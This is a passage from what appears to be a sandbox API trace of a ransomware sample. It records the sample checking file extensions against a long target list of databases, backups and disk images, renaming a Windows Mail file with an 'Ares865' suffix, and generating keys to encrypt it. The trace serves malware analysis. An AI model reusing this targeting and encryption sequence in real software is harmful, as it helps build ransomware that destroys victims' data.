returned="WindowsMail.pat" [0063.299] lstrlenW (lpString="WindowsMail.pat") returned 15 [0063.300] lstrlenW (lpString="Ares865") returned 7 [0063.300] lstrcmpiW (lpString1="ail.pat", lpString2="Ares865") returned -1 [0063.300] lstrlenW (lpString=".dll") returned 4 [0063.300] lstrcmpiW (lpString1="WindowsMail.pat", lpString2=".dll") returned 1 [0063.300] lstrlenW (lpString=".lnk") returned 4 [0063.302] lstrcmpiW (lpString1="WindowsMail.pat", lpString2=".lnk") returned 1 [0063.303] lstrlenW (lpString=".ini") returned 4 [0063.304] lstrcmpiW (lpString1="WindowsMail.pat", lpString2=".ini") returned 1 [0063.304] lstrlenW (lpString=".sys") returned 4 [0063.304] lstrcmpiW (lpString1="WindowsMail.pat", lpString2=".sys") returned 1 [0063.305] lstrlenW (lpString="WindowsMail.pat") returned 15 [0063.305] lstrlenW (lpString="bak") returned 3 [0063.305] lstrcmpiW (lpString1="pat", lpString2="bak") returned 1 [0063.305] lstrlenW (lpString="ba_") returned 3 [0063.307] lstrcmpiW (lpString1="pat", lpString2="ba_") returned 1 [0063.308] lstrlenW (lpString="dbb") returned 3 [0063.308] lstrcmpiW (lpString1="pat", lpString2="dbb") returned 1 [0063.308] lstrlenW (lpString="vmdk") returned 4 [0063.308] lstrcmpiW (lpString1=".pat", lpString2="vmdk") returned -1 [0063.308] lstrlenW (lpString="rar") returned 3 [0063.309] lstrcmpiW (lpString1="pat", lpString2="rar") returned -1 [0063.309] lstrlenW (lpString="zip") returned 3 [0063.310] lstrcmpiW (lpString1="pat", lpString2="zip") returned -1 [0063.311] lstrlenW (lpString="tgz") returned 3 [0063.312] lstrcmpiW (lpString1="pat", lpString2="tgz") returned -1 [0063.312] lstrlenW (lpString="vbox") returned 4 [0063.312] lstrcmpiW (lpString1=".pat", lpString2="vbox") returned -1 [0063.312] lstrlenW (lpString="vdi") returned 3 [0063.313] lstrcmpiW (lpString1="pat", lpString2="vdi") returned -1 [0063.313] lstrlenW (lpString="vhd") returned 3 [0063.314] lstrcmpiW (lpString1="pat", lpString2="vhd") returned -1 [0063.315] lstrlenW (lpString="vhdx") returned 4 [0063.315] lstrcmpiW (lpString1=".pat", lpString2="vhdx") returned -1 [0063.317] lstrlenW (lpString="avhd") returned 4 [0063.318] lstrcmpiW (lpString1=".pat", lpString2="avhd") returned -1 [0063.318] lstrlenW (lpString="db") returned 2 [0063.318] lstrcmpiW (lpString1="at", lpString2="db") returned -1 [0063.319] lstrlenW (lpString="db2") returned 3 [0063.319] lstrcmpiW (lpString1="pat", lpString2="db2") returned 1 [0063.320] lstrlenW (lpString="db3") returned 3 [0063.322] lstrcmpiW (lpString1="pat", lpString2="db3") returned 1 [0063.322] lstrlenW (lpString="dbf") returned 3 [0063.322] lstrcmpiW (lpString1="pat", lpString2="dbf") returned 1 [0063.322] lstrlenW (lpString="mdf") returned 3 [0063.322] lstrcmpiW (lpString1="pat", lpString2="mdf") returned 1 [0063.322] lstrlenW (lpString="mdb") returned 3 [0063.322] lstrcmpiW (lpString1="pat", lpString2="mdb") returned 1 [0063.322] lstrlenW (lpString="sql") returned 3 [0063.322] lstrcmpiW (lpString1="pat", lpString2="sql") returned -1 [0063.322] lstrlenW (lpString="sqlite") returned 6 [0063.322] lstrcmpiW (lpString1="il.pat", lpString2="sqlite") returned -1 [0063.322] lstrlenW (lpString="sqlite3") returned 7 [0063.322] lstrcmpiW (lpString1="ail.pat", lpString2="sqlite3") returned -1 [0063.322] lstrlenW (lpString="sqlitedb") returned 8 [0063.323] lstrcmpiW (lpString1="Mail.pat", lpString2="sqlitedb") returned -1 [0063.323] lstrlenW (lpString="xml") returned 3 [0063.323] lstrcmpiW (lpString1="pat", lpString2="xml") returned -1 [0063.323] lstrlenW (lpString="$er") returned 3 [0063.323] lstrcmpiW (lpString1="pat", lpString2="$er") returned 1 [0063.323] lstrlenW (lpString="4dd") returned 3 [0063.323] lstrcmpiW (lpString1="pat", lpString2="4dd") returned 1 [0063.323] lstrlenW (lpString="4dl") returned 3 [0063.323] lstrcmpiW (lpString1="pat", lpString2="4dl") returned 1 [0063.323] lstrlenW (lpString="^^^") returned 3 [0063.323] lstrcmpiW (lpString1="pat", lpString2="^^^") returned 1 [0063.323] lstrlenW (lpString="abs") returned 3 [0063.323] lstrcmpiW (lpString1="pat", lpString2="abs") returned 1 [0063.323] lstrlenW (lpString="abx") returned 3 [0063.323] lstrcmpiW (lpString1="pat", lpString2="abx") returned 1 [0063.323] lstrlenW (lpString="accdb") returned 5 [0063.323] lstrcmpiW (lpString1="l.pat", lpString2="accdb") returned 1 [0063.323] lstrlenW (lpString="accdc") returned 5 [0063.323] lstrcmpiW (lpString1="l.pat", lpString2="accdc") returned 1 [0063.323] lstrlenW (lpString="accde") returned 5 [0063.323] lstrcmpiW (lpString1="l.pat", lpString2="accde") returned 1 [0063.323] lstrlenW (lpString="accdr") returned 5 [0063.323] lstrcmpiW (lpString1="l.pat", lpString2="accdr") returned 1 [0063.323] lstrlenW (lpString="accdt") returned 5 [0063.323] lstrcmpiW (lpString1="l.pat", lpString2="accdt") returned 1 [0063.323] lstrlenW (lpString="accdw") returned 5 [0063.323] lstrcmpiW (lpString1="l.pat", lpString2="accdw") returned 1 [0063.323] lstrlenW (lpString="accft") returned 5 [0063.323] lstrcmpiW (lpString1="l.pat", lpString2="accft") returned 1 [0063.323] lstrlenW (lpString="adb") returned 3 [0063.323] lstrcmpiW (lpString1="pat", lpString2="adb") returned 1 [0063.323] lstrlenW (lpString="adb") returned 3 [0063.323] lstrcmpiW (lpString1="pat", lpString2="adb") returned 1 [0063.323] lstrlenW (lpString="ade") returned 3 [0063.323] lstrcmpiW (lpString1="pat", lpString2="ade") returned 1 [0063.324] lstrlenW (lpString="adf") returned 3 [0063.324] lstrcmpiW (lpString1="pat", lpString2="adf") returned 1 [0063.324] lstrlenW (lpString="adn") returned 3 [0063.324] lstrcmpiW (lpString1="pat", lpString2="adn") returned 1 [0063.324] lstrlenW (lpString="adp") returned 3 [0063.324] lstrcmpiW (lpString1="pat", lpString2="adp") returned 1 [0063.324] lstrlenW (lpString="alf") returned 3 [0063.324] lstrcmpiW (lpString1="pat", lpString2="alf") returned 1 [0063.324] lstrlenW (lpString="ask") returned 3 [0063.324] lstrcmpiW (lpString1="pat", lpString2="ask") returned 1 [0063.324] lstrlenW (lpString="btr") returned 3 [0063.324] lstrcmpiW (lpString1="pat", lpString2="btr") returned 1 [0063.324] lstrlenW (lpString="cat") returned 3 [0063.324] lstrcmpiW (lpString1="pat", lpString2="cat") returned 1 [0063.324] lstrlenW (lpString="cdb") returned 3 [0063.324] lstrcmpiW (lpString1="pat", lpString2="cdb") returned 1 [0063.324] lstrlenW (lpString="ckp") returned 3 [0063.324] lstrcmpiW (lpString1="pat", lpString2="ckp") returned 1 [0063.324] lstrlenW (lpString="cma") returned 3 [0063.324] lstrcmpiW (lpString1="pat", lpString2="cma") returned 1 [0063.324] lstrlenW (lpString="cpd") returned 3 [0063.324] lstrcmpiW (lpString1="pat", lpString2="cpd") returned 1 [0063.324] lstrlenW (lpString="dacpac") returned 6 [0063.324] lstrcmpiW (lpString1="il.pat", lpString2="dacpac") returned 1 [0063.324] lstrlenW (lpString="dad") returned 3 [0063.324] lstrcmpiW (lpString1="pat", lpString2="dad") returned 1 [0063.324] lstrlenW (lpString="dadiagrams") returned 10 [0063.324] lstrcmpiW (lpString1="wsMail.pat", lpString2="dadiagrams") returned 1 [0063.324] lstrlenW (lpString="daschema") returned 8 [0063.324] lstrcmpiW (lpString1="Mail.pat", lpString2="daschema") returned 1 [0063.324] lstrlenW (lpString="db-journal") returned 10 [0063.324] lstrcmpiW (lpString1="wsMail.pat", lpString2="db-journal") returned 1 [0063.324] lstrlenW (lpString="db-shm") returned 6 [0063.324] lstrcmpiW (lpString1="il.pat", lpString2="db-shm") returned 1 [0063.324] lstrlenW (lpString="db-wal") returned 6 [0063.324] lstrcmpiW (lpString1="il.pat", lpString2="db-wal") returned 1 [0063.324] lstrlenW (lpString="dbc") returned 3 [0063.325] lstrcmpiW (lpString1="pat", lpString2="dbc") returned 1 [0063.325] lstrlenW (lpString="dbs") returned 3 [0063.325] lstrcmpiW (lpString1="pat", lpString2="dbs") returned 1 [0063.325] lstrlenW (lpString="dbt") returned 3 [0063.325] lstrcmpiW (lpString1="pat", lpString2="dbt") returned 1 [0063.325] lstrlenW (lpString="dbv") returned 3 [0063.325] lstrcmpiW (lpString1="pat", lpString2="dbv") returned 1 [0063.325] lstrlenW (lpString="dbx") returned 3 [0063.325] lstrcmpiW (lpString1="pat", lpString2="dbx") returned 1 [0063.325] lstrlenW (lpString="dcb") returned 3 [0063.325] lstrcmpiW (lpString1="pat", lpString2="dcb") returned 1 [0063.325] lstrlenW (lpString="dct") returned 3 [0063.325] lstrcmpiW (lpString1="pat", lpString2="dct") returned 1 [0063.325] lstrlenW (lpString="dcx") returned 3 [0063.325] lstrcmpiW (lpString1="pat", lpString2="dcx") returned 1 [0063.325] lstrlenW (lpString="ddl") returned 3 [0063.325] lstrcmpiW (lpString1="pat", lpString2="ddl") returned 1 [0063.325] lstrlenW (lpString="dlis") returned 4 [0063.325] lstrcmpiW (lpString1=".pat", lpString2="dlis") returned -1 [0063.325] lstrlenW (lpString="dp1") returned 3 [0063.325] lstrcmpiW (lpString1="pat", lpString2="dp1") returned 1 [0063.325] lstrlenW (lpString="dqy") returned 3 [0063.325] lstrcmpiW (lpString1="pat", lpString2="dqy") returned 1 [0063.325] lstrlenW (lpString="dsk") returned 3 [0063.325] lstrcmpiW (lpString1="pat", lpString2="dsk") returned 1 [0063.325] lstrlenW (lpString="dsn") returned 3 [0063.325] lstrcmpiW (lpString1="pat", lpString2="dsn") returned 1 [0063.325] lstrlenW (lpString="dtsx") returned 4 [0063.325] lstrcmpiW (lpString1=".pat", lpString2="dtsx") returned -1 [0063.325] lstrlenW (lpString="dxl") returned 3 [0063.325] lstrcmpiW (lpString1="pat", lpString2="dxl") returned 1 [0063.325] lstrlenW (lpString="eco") returned 3 [0063.325] lstrcmpiW (lpString1="pat", lpString2="eco") returned 1 [0063.325] lstrlenW (lpString="ecx") returned 3 [0063.325] lstrcmpiW (lpString1="pat", lpString2="ecx") returned 1 [0063.325] lstrlenW (lpString="edb") returned 3 [0063.325] lstrcmpiW (lpString1="pat", lpString2="edb") returned 1 [0063.326] lstrlenW (lpString="epim") returned 4 [0063.326] lstrcmpiW (lpString1=".pat", lpString2="epim") returned -1 [0063.326] lstrlenW (lpString="fcd") returned 3 [0063.326] lstrcmpiW (lpString1="pat", lpString2="fcd") returned 1 [0063.326] lstrlenW (lpString="fdb") returned 3 [0063.326] lstrcmpiW (lpString1="pat", lpString2="fdb") returned 1 [0063.326] lstrlenW (lpString="fic") returned 3 [0063.326] lstrcmpiW (lpString1="pat", lpString2="fic") returned 1 [0063.326] lstrlenW (lpString="flexolibrary") returned 12 [0063.326] lstrcmpiW (lpString1="dowsMail.pat", lpString2="flexolibrary") returned -1 [0063.326] lstrlenW (lpString="fm5") returned 3 [0063.326] lstrcmpiW (lpString1="pat", lpString2="fm5") returned 1 [0063.326] lstrlenW (lpString="fmp") returned 3 [0063.326] lstrcmpiW (lpString1="pat", lpString2="fmp") returned 1 [0063.326] lstrlenW (lpString="fmp12") returned 5 [0063.326] lstrcmpiW (lpString1="l.pat", lpString2="fmp12") returned 1 [0063.326] lstrlenW (lpString="fmpsl") returned 5 [0063.326] lstrcmpiW (lpString1="l.pat", lpString2="fmpsl") returned 1 [0063.326] lstrlenW (lpString="fol") returned 3 [0063.326] lstrcmpiW (lpString1="pat", lpString2="fol") returned 1 [0063.326] lstrlenW (lpString="fp3") returned 3 [0063.326] lstrcmpiW (lpString1="pat", lpString2="fp3") returned 1 [0063.326] lstrlenW (lpString="fp4") returned 3 [0063.326] lstrcmpiW (lpString1="pat", lpString2="fp4") returned 1 [0063.326] lstrlenW (lpString="fp5") returned 3 [0063.326] lstrcmpiW (lpString1="pat", lpString2="fp5") returned 1 [0063.326] lstrlenW (lpString="fp7") returned 3 [0063.326] lstrcmpiW (lpString1="pat", lpString2="fp7") returned 1 [0063.326] lstrlenW (lpString="fpt") returned 3 [0063.326] lstrcmpiW (lpString1="pat", lpString2="fpt") returned 1 [0063.326] lstrlenW (lpString="frm") returned 3 [0063.326] lstrcmpiW (lpString1="pat", lpString2="frm") returned 1 [0063.326] lstrlenW (lpString="gdb") returned 3 [0063.326] lstrcmpiW (lpString1="pat", lpString2="gdb") returned 1 [0063.327] lstrlenW (lpString="gdb") returned 3 [0063.327] lstrcmpiW (lpString1="pat", lpString2="gdb") returned 1 [0063.327] lstrlenW (lpString="grdb") returned 4 [0063.327] lstrcmpiW (lpString1=".pat", lpString2="grdb") returned -1 [0063.327] lstrlenW (lpString="gwi") returned 3 [0063.327] lstrcmpiW (lpString1="pat", lpString2="gwi") returned 1 [0063.327] lstrlenW (lpString="hdb") returned 3 [0063.327] lstrcmpiW (lpString1="pat", lpString2="hdb") returned 1 [0063.327] lstrlenW (lpString="his") returned 3 [0063.327] lstrcmpiW (lpString1="pat", lpString2="his") returned 1 [0063.327] lstrlenW (lpString="ib") returned 2 [0063.327] lstrcmpiW (lpString1="at", lpString2="ib") returned -1 [0063.327] lstrlenW (lpString="idb") returned 3 [0063.327] lstrcmpiW (lpString1="pat", lpString2="idb") returned 1 [0063.327] lstrlenW (lpString="ihx") returned 3 [0063.327] lstrcmpiW (lpString1="pat", lpString2="ihx") returned 1 [0063.327] lstrlenW (lpString="itdb") returned 4 [0063.327] lstrcmpiW (lpString1=".pat", lpString2="itdb") returned -1 [0063.327] lstrlenW (lpString="itw") returned 3 [0063.327] lstrcmpiW (lpString1="pat", lpString2="itw") returned 1 [0063.327] lstrlenW (lpString="jet") returned 3 [0063.327] lstrcmpiW (lpString1="pat", lpString2="jet") returned 1 [0063.327] lstrlenW (lpString="jtx") returned 3 [0063.327] lstrcmpiW (lpString1="pat", lpString2="jtx") returned 1 [0063.327] lstrlenW (lpString="kdb") returned 3 [0063.327] lstrcmpiW (lpString1="pat", lpString2="kdb") returned 1 [0063.327] lstrlenW (lpString="kexi") returned 4 [0063.327] lstrcmpiW (lpString1=".pat", lpString2="kexi") returned -1 [0063.327] lstrlenW (lpString="kexic") returned 5 [0063.327] lstrcmpiW (lpString1="l.pat", lpString2="kexic") returned 1 [0063.327] lstrlenW (lpString="kexis") returned 5 [0063.327] lstrcmpiW (lpString1="l.pat", lpString2="kexis") returned 1 [0063.327] lstrlenW (lpString="lgc") returned 3 [0063.327] lstrcmpiW (lpString1="pat", lpString2="lgc") returned 1 [0063.327] lstrlenW (lpString="lwx") returned 3 [0063.327] lstrcmpiW (lpString1="pat", lpString2="lwx") returned 1 [0063.328] lstrlenW (lpString="maf") returned 3 [0063.328] lstrcmpiW (lpString1="pat", lpString2="maf") returned 1 [0063.328] lstrlenW (lpString="maq") returned 3 [0063.328] lstrcmpiW (lpString1="pat", lpString2="maq") returned 1 [0063.328] lstrlenW (lpString="mar") returned 3 [0063.328] lstrcmpiW (lpString1="pat", lpString2="mar") returned 1 [0063.328] lstrlenW (lpString="marshal") returned 7 [0063.328] lstrcmpiW (lpString1="ail.pat", lpString2="marshal") returned -1 [0063.328] lstrlenW (lpString="mas") returned 3 [0063.328] lstrcmpiW (lpString1="pat", lpString2="mas") returned 1 [0063.328] lstrlenW (lpString="mav") returned 3 [0063.328] lstrcmpiW (lpString1="pat", lpString2="mav") returned 1 [0063.328] lstrlenW (lpString="maw") returned 3 [0063.328] lstrcmpiW (lpString1="pat", lpString2="maw") returned 1 [0063.328] lstrlenW (lpString="mdbhtml") returned 7 [0063.328] lstrcmpiW (lpString1="ail.pat", lpString2="mdbhtml") returned -1 [0063.328] lstrlenW (lpString="mdn") returned 3 [0063.328] lstrcmpiW (lpString1="pat", lpString2="mdn") returned 1 [0063.328] lstrlenW (lpString="mdt") returned 3 [0063.328] lstrcmpiW (lpString1="pat", lpString2="mdt") returned 1 [0063.328] lstrlenW (lpString="mfd") returned 3 [0063.328] lstrcmpiW (lpString1="pat", lpString2="mfd") returned 1 [0063.328] lstrlenW (lpString="mpd") returned 3 [0063.328] lstrcmpiW (lpString1="pat", lpString2="mpd") returned 1 [0063.328] lstrlenW (lpString="mrg") returned 3 [0063.328] lstrcmpiW (lpString1="pat", lpString2="mrg") returned 1 [0063.328] lstrlenW (lpString="mud") returned 3 [0063.328] lstrcmpiW (lpString1="pat", lpString2="mud") returned 1 [0063.328] lstrlenW (lpString="mwb") returned 3 [0063.328] lstrcmpiW (lpString1="pat", lpString2="mwb") returned 1 [0063.328] lstrlenW (lpString="myd") returned 3 [0063.328] lstrcmpiW (lpString1="pat", lpString2="myd") returned 1 [0063.328] lstrlenW (lpString="ndf") returned 3 [0063.328] lstrcmpiW (lpString1="pat", lpString2="ndf") returned 1 [0063.328] lstrlenW (lpString="nnt") returned 3 [0063.328] lstrcmpiW (lpString1="pat", lpString2="nnt") returned 1 [0063.328] lstrlenW (lpString="nrmlib") returned 6 [0063.329] lstrcmpiW (lpString1="il.pat", lpString2="nrmlib") returned -1 [0063.329] lstrlenW (lpString="ns2") returned 3 [0063.329] lstrcmpiW (lpString1="pat", lpString2="ns2") returned 1 [0063.329] lstrlenW (lpString="ns3") returned 3 [0063.329] lstrcmpiW (lpString1="pat", lpString2="ns3") returned 1 [0063.329] lstrlenW (lpString="ns4") returned 3 [0063.329] lstrcmpiW (lpString1="pat", lpString2="ns4") returned 1 [0063.329] lstrlenW (lpString="nsf") returned 3 [0063.329] lstrcmpiW (lpString1="pat", lpString2="nsf") returned 1 [0063.329] lstrlenW (lpString="nv") returned 2 [0063.329] lstrcmpiW (lpString1="at", lpString2="nv") returned -1 [0063.329] lstrlenW (lpString="nv2") returned 3 [0063.329] lstrcmpiW (lpString1="pat", lpString2="nv2") returned 1 [0063.329] lstrlenW (lpString="nwdb") returned 4 [0063.329] lstrcmpiW (lpString1=".pat", lpString2="nwdb") returned -1 [0063.329] lstrlenW (lpString="nyf") returned 3 [0063.329] lstrcmpiW (lpString1="pat", lpString2="nyf") returned 1 [0063.329] lstrlenW (lpString="odb") returned 3 [0063.329] lstrcmpiW (lpString1="pat", lpString2="odb") returned 1 [0063.329] lstrlenW (lpString="odb") returned 3 [0063.329] lstrcmpiW (lpString1="pat", lpString2="odb") returned 1 [0063.329] lstrlenW (lpString="oqy") returned 3 [0063.329] lstrcmpiW (lpString1="pat", lpString2="oqy") returned 1 [0063.329] lstrlenW (lpString="ora") returned 3 [0063.329] lstrcmpiW (lpString1="pat", lpString2="ora") returned 1 [0063.329] lstrlenW (lpString="orx") returned 3 [0063.329] lstrcmpiW (lpString1="pat", lpString2="orx") returned 1 [0063.329] lstrlenW (lpString="owc") returned 3 [0063.329] lstrcmpiW (lpString1="pat", lpString2="owc") returned 1 [0063.329] lstrlenW (lpString="p96") returned 3 [0063.329] lstrcmpiW (lpString1="pat", lpString2="p96") returned 1 [0063.329] lstrlenW (lpString="p97") returned 3 [0063.329] lstrcmpiW (lpString1="pat", lpString2="p97") returned 1 [0063.329] lstrlenW (lpString="pan") returned 3 [0063.329] lstrcmpiW (lpString1="pat", lpString2="pan") returned 1 [0063.329] lstrlenW (lpString="pdb") returned 3 [0063.330] lstrcmpiW (lpString1="pat", lpString2="pdb") returned -1 [0063.330] lstrlenW (lpString="pdm") returned 3 [0063.330] lstrcmpiW (lpString1="pat", lpString2="pdm") returned -1 [0063.330] lstrlenW (lpString="pnz") returned 3 [0063.330] lstrcmpiW (lpString1="pat", lpString2="pnz") returned -1 [0063.330] lstrlenW (lpString="qry") returned 3 [0063.330] lstrcmpiW (lpString1="pat", lpString2="qry") returned -1 [0063.330] lstrlenW (lpString="qvd") returned 3 [0063.330] lstrcmpiW (lpString1="pat", lpString2="qvd") returned -1 [0063.330] lstrlenW (lpString="rbf") returned 3 [0063.330] lstrcmpiW (lpString1="pat", lpString2="rbf") returned -1 [0063.330] lstrlenW (lpString="rctd") returned 4 [0063.330] lstrcmpiW (lpString1=".pat", lpString2="rctd") returned -1 [0063.330] lstrlenW (lpString="rod") returned 3 [0063.330] lstrcmpiW (lpString1="pat", lpString2="rod") returned -1 [0063.330] lstrlenW (lpString="rodx") returned 4 [0063.330] lstrcmpiW (lpString1=".pat", lpString2="rodx") returned -1 [0063.330] lstrlenW (lpString="rpd") returned 3 [0063.330] lstrcmpiW (lpString1="pat", lpString2="rpd") returned -1 [0063.330] lstrlenW (lpString="rsd") returned 3 [0063.330] lstrcmpiW (lpString1="pat", lpString2="rsd") returned -1 [0063.330] lstrlenW (lpString="sas7bdat") returned 8 [0063.330] lstrcmpiW (lpString1="Mail.pat", lpString2="sas7bdat") returned -1 [0063.330] lstrlenW (lpString="sbf") returned 3 [0063.330] lstrcmpiW (lpString1="pat", lpString2="sbf") returned -1 [0063.330] lstrlenW (lpString="scx") returned 3 [0063.330] lstrcmpiW (lpString1="pat", lpString2="scx") returned -1 [0063.330] lstrlenW (lpString="sdb") returned 3 [0063.330] lstrcmpiW (lpString1="pat", lpString2="sdb") returned -1 [0063.330] lstrlenW (lpString="sdc") returned 3 [0063.330] lstrcmpiW (lpString1="pat", lpString2="sdc") returned -1 [0063.330] lstrlenW (lpString="sdf") returned 3 [0063.331] lstrcmpiW (lpString1="pat", lpString2="sdf") returned -1 [0063.331] lstrlenW (lpString="sis") returned 3 [0063.331] lstrcmpiW (lpString1="pat", lpString2="sis") returned -1 [0063.331] lstrlenW (lpString="spq") returned 3 [0063.331] lstrcmpiW (lpString1="pat", lpString2="spq") returned -1 [0063.331] lstrlenW (lpString="te") returned 2 [0063.331] lstrcmpiW (lpString1="at", lpString2="te") returned -1 [0063.331] lstrlenW (lpString="teacher") returned 7 [0063.331] lstrcmpiW (lpString1="ail.pat", lpString2="teacher") returned -1 [0063.331] lstrlenW (lpString="tmd") returned 3 [0063.331] lstrcmpiW (lpString1="pat", lpString2="tmd") returned -1 [0063.331] lstrlenW (lpString="tps") returned 3 [0063.331] lstrcmpiW (lpString1="pat", lpString2="tps") returned -1 [0063.331] lstrlenW (lpString="trc") returned 3 [0063.331] lstrcmpiW (lpString1="pat", lpString2="trc") returned -1 [0063.331] lstrlenW (lpString="trc") returned 3 [0063.331] lstrcmpiW (lpString1="pat", lpString2="trc") returned -1 [0063.331] lstrlenW (lpString="trm") returned 3 [0063.331] lstrcmpiW (lpString1="pat", lpString2="trm") returned -1 [0063.331] lstrlenW (lpString="udb") returned 3 [0063.331] lstrcmpiW (lpString1="pat", lpString2="udb") returned -1 [0063.331] lstrlenW (lpString="udl") returned 3 [0063.331] lstrcmpiW (lpString1="pat", lpString2="udl") returned -1 [0063.331] lstrlenW (lpString="usr") returned 3 [0063.331] lstrcmpiW (lpString1="pat", lpString2="usr") returned -1 [0063.331] lstrlenW (lpString="v12") returned 3 [0063.331] lstrcmpiW (lpString1="pat", lpString2="v12") returned -1 [0063.331] lstrlenW (lpString="vis") returned 3 [0063.331] lstrcmpiW (lpString1="pat", lpString2="vis") returned -1 [0063.331] lstrlenW (lpString="vpd") returned 3 [0063.331] lstrcmpiW (lpString1="pat", lpString2="vpd") returned -1 [0063.331] lstrlenW (lpString="vvv") returned 3 [0063.331] lstrcmpiW (lpString1="pat", lpString2="vvv") returned -1 [0063.331] lstrlenW (lpString="wdb") returned 3 [0063.331] lstrcmpiW (lpString1="pat", lpString2="wdb") returned -1 [0063.331] lstrlenW (lpString="wmdb") returned 4 [0063.332] lstrcmpiW (lpString1=".pat", lpString2="wmdb") returned -1 [0063.332] lstrlenW (lpString="wrk") returned 3 [0063.332] lstrcmpiW (lpString1="pat", lpString2="wrk") returned -1 [0063.332] lstrlenW (lpString="xdb") returned 3 [0063.332] lstrcmpiW (lpString1="pat", lpString2="xdb") returned -1 [0063.332] lstrlenW (lpString="xld") returned 3 [0063.332] lstrcmpiW (lpString1="pat", lpString2="xld") returned -1 [0063.332] lstrlenW (lpString="xmlff") returned 5 [0063.332] lstrcmpiW (lpString1="l.pat", lpString2="xmlff") returned -1 [0063.332] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\WindowsMail.pat.Ares865") returned 83 [0063.332] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\WindowsMail.pat" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\windowsmail.pat"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\WindowsMail.pat.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\windowsmail.pat.ares865"), dwFlags=0x1) returned 1 [0063.333] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\WindowsMail.pat.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\windowsmail.pat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0063.334] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16384) returned 1 [0063.334] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0063.334] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0063.334] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0063.334] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0063.335] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0063.335] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.335] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4300, lpName=0x0) returned 0x164 [0063.337] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4300) returned 0x190000 [0063.338] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0063.339] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0063.339] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.339] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0063.339] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0063.339] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0063.339] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0063.339] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0063.339] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0063.339] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0063.340] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0063.340] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0063.340] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0063.340] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0063.340] CloseHandle (hObject=0x164) returned 1 [0063.340] CloseHandle (hObject=0x154) returned 1 [0063.340] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0063.340] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0063.340] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0063.340] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6451100, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2e234eb, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WindowsMail.pat", cAlternateFileName="WINDOW~1.PAT")) returned 0 [0063.341] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0063.341] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d23a8 [0063.341] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery", 